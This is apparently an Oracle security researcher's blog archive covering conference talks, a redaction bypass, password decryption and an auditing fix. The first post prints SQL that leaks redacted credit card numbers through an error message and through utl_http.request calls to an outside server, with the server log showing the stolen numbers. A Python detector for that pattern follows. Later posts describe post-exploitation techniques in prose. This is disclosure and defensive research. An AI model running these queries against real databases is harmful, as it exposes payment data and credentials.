Archive for the ‘11g’ Category

Best of Oracle Security 2013

Friday, November 22nd, 2013

I just uploaded my DOAG 2013 presentation "Best of Oracle Security 2013".


This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, hide information from Oracle auditing using VPD, and more…


SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:

ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at "ORDSYS.ORDERROR", line 5
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 1394
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 479
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 8232
ORA-06512: at "ORDSYS.ORD_DICOM", line 756
ORA-06512: at line 1




select * from credit_card where 1=length(utl_http.request(‚’||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause


——– output from access.log ————

– – [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /1234-1234-1234-1234 HTTP/1.1" 404 35 – –
– – [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /5678-5678-5678-5678 HTTP/1.1" 404 35 – –

——– output from access.log ————
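Both statements above work because the redacted column is handed to a function inside the WHERE clause, so the real value reaches the function and leaks through an error message or an outbound request. The following detection sketch is an added example, not code from the presentation: it scans SQL text (for instance from an audit trail) for that pattern. The column list, the function name `redacted_args_in_where`, the sample statements and the placeholder URL are assumptions made for illustration.

```python
import re

# Assumption: columns covered by a redaction policy (on a real system this
# list would come from the REDACTION_COLUMNS dictionary view).
REDACTED = {"CARD_ID"}
# string literal | (dotted) identifier | any other single character
TOKEN = re.compile(r"'(?:[^']|'')*'|[A-Za-z_][\w$#]*(?:\.[A-Za-z_][\w$#]*)*|\S")
CLAUSE_END = {"GROUP", "ORDER", "HAVING", "UNION", "MINUS", "INTERSECT"}
NOT_FUNCTIONS = {"WHERE", "AND", "OR", "NOT", "IN", "EXISTS", "ANY", "ALL"}

def redacted_args_in_where(sql, redacted=REDACTED):
    """Return sorted (function, column) pairs where a redacted column is an
    argument of a function call inside the top-level WHERE clause."""
    hits, stack, prev, in_where = set(), [], None, False
    for tok in TOKEN.findall(sql):
        up = tok.upper()
        is_ident = tok[0].isalpha() or tok[0] == "_"
        if tok == "(":
            # identifier directly before "(" is a function name, else grouping
            stack.append(prev if prev not in NOT_FUNCTIONS else None)
        elif tok == ")" and stack:
            stack.pop()
        elif is_ident and not stack and up == "WHERE":
            in_where = True
        elif is_ident and not stack and up in CLAUSE_END:
            in_where = False
        elif is_ident and in_where and up.rsplit(".", 1)[-1] in redacted:
            calls = [f for f in stack if f]
            if calls:  # innermost enclosing function receives the real value
                hits.add((calls[-1], up.rsplit(".", 1)[-1]))
        prev = up if is_ident else None
    return sorted(hits)

# Constructed sample of audited SQL text; the first two follow the statements
# shown in the post (the URL is a placeholder, the original was not preserved).
SAMPLE = [
    "select * from scott.credit_card where "
    "1=ordsys.ord_dicom.getmappingxpath((card_id),user,user)",
    "select * from credit_card where "
    "1=length(utl_http.request('http://placeholder.invalid/'||card_id))",
    "select card_id from credit_card where owner = upper('SMITH') order by card_id",
    "select * from credit_card where (card_id = '1234') and owner in ('A', 'B')",
]

if __name__ == "__main__":
    for stmt in SAMPLE:
        print(redacted_args_in_where(stmt) or "ok", "<-", stmt)
```

The heuristic flags only function calls; a plain comparison on a redacted column in the WHERE clause is not reported.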



Decrypt Oracle and database link passwords

Wednesday, October 2nd, 2013

At Derbycon 3.0, László Tóth and Ferenc Spala gave a new presentation "What’s common in Oracle and Samsung? They tried to think differently…" (Video). The main focus of the presentation was the Samsung encryption and a new framework called sandy, but there was also a small Oracle part.

Laszlo and Ferenc showed how to decrypt Oracle database links in Oracle and Oracle using a small utility called "". In previous versions Oracle used DES to encrypt/decrypt database links. These database link passwords start with "05" (Oracle’s indicator for DES).


Fix for oradebug disable auditing available (

Friday, September 13th, 2013

Two days ago I gave a presentation "Oracle 12c from the attackers perspective" at the DOAG SIG Security. I learned some interesting things, especially that a fix for the Oracle oradebug "disable auditing" problem has been available for 9 months.

Oradebug allows running OS commands and enabling/disabling Oracle SYSDBA and normal auditing on the fly without leaving traces in the audit log. The fix for this problem is available in Oracle and was backported to using the patches 15805002, 15808245, 16177780.

By default the setting is not enabled in Oracle

The undocumented parameter _fifteenth_spare_parameter (Oracle description: fifteenth spare parameter – integer – yeah, really useful) can now disable or limit the oradebug functionality. I could not find any information about this parameter on Google or My Oracle Support.

—— extract from the read me.txt of the patch file——————

## _fifteenth_spare_parameter can be set to "all", "restricted" or "none"
## "all" disables execution of all oradebug commands, "restricted" disables
## execution of restricted oradebug commands, "none" (default) allows execution
## of oradebug commands.

—— extract from the read me.txt ——————



DOAG 2012: Best of Oracle Security 2012

Thursday, November 22nd, 2012

Yesterday I gave a presentation "Best of Oracle Security 2012" at the DOAG 2012 conference in Nürnberg.

Best of Oracle Security

Laszlo’s presentation "Oracle Post Exploitation Techniques" and Marcel’s Sybase ASE Password Cracker

Tuesday, September 21st, 2010

Last weekend I gave a presentation "Security comparison of different databases" (Oracle, MySQL, MSSQL, DB2 LUW, PostgreSQL and Sybase ASE) at the Hacktivity 2010 conference in Budapest. A blog entry dedicated to this will be released soon.

I saw Laszlo’s presentation "Oracle post exploitation techniques" and even got a private sneak preview of his presentation in English 1 day before.

Laszlo talked about very very interesting things (at least for me) and I personally think that this is one of the best Oracle security research papers I know. Also some paranoid customers have to rethink their security architecture because this research affects DB Vault and Oracle TDE as well (every OS user can see every cleartext password during the logon process).

  • Decrypt the Enterprise Manager/Grid Control passwords in newer versions.
    The simple way using sysman.decrypt() no longer works in newer versions of Oracle. His approach is to read the key from the file emkey.ora and use sysman.mgmt_time_sync to set the key. This works in new versions as well.
  • DLL injection:
    A malicious OS user (e.g. DBA or Unix root) on the database server can intercept the cleartext password on the database server during logon. He showed working examples running on Windows and Linux (!!!)
  • Decrypt TDE encrypted data and extract the TDE masterkey from the Oracle wallet
  • Analysis of the Oracle 11g Remote Job Scheduling.

The second really good presentation was from Marcell Major about reversing password algorithms. He showed different ways to do this and how he did it for Sybase ASE database passwords. Especially the old SYS-PROP based on a FEAL algorithm was really impressive. But this presentation is currently not online.

Marcell already released the password cracker for the new Sybase ASE SHA256 algorithm.

Our new Repscan 4.0 now supports Sybase ASE, PostgreSQL and Microsoft SQL Azure and can crack all these passwords.